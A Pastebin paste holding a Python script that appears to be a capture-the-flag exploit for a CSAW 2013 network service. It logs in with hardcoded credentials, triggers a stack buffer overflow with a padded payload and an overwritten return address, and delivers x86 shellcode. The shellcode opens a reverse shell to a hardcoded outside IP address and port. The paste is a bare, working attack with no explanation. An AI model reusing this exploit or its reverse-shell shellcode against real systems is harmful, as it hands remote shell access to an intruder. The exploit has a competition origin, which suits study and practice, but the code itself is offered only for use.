Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import socket,time
- from struct import *
- import binascii
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.connect(("localhost", 34266))
- print "stg 1"
- time.sleep(1)
- s.send("csaw2013\nS1mplePWD\n") #login
- print "stg 2"
- time.sleep(1)
- s.send("-1\n")
- print s.recv(4096)
- address = 0xbffff650 # address took from stack
- shellcode="\x31\xdb\xf7\xe3\x52\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x93\x59\x68" + "\x4F\x36\x69\x20" +"\x66\x68" +"\x27\x1a" +"\x66\x51\xb0\x3f\xcd\x80\x49\x79\xf9\x89\xe1\x6a\x10\x51\x53\x89\xe1\xb0" +"\x66\xcd\x80\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x31\xc9\x89\xe3" +"\xb0\x0b\xcd\x80"
- payload = "a" * 1056 # padding
- payload += pack('<I', address) # eip
- payload += "\x90" * 80 + shellcode #shellcode
- s.send(payload)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement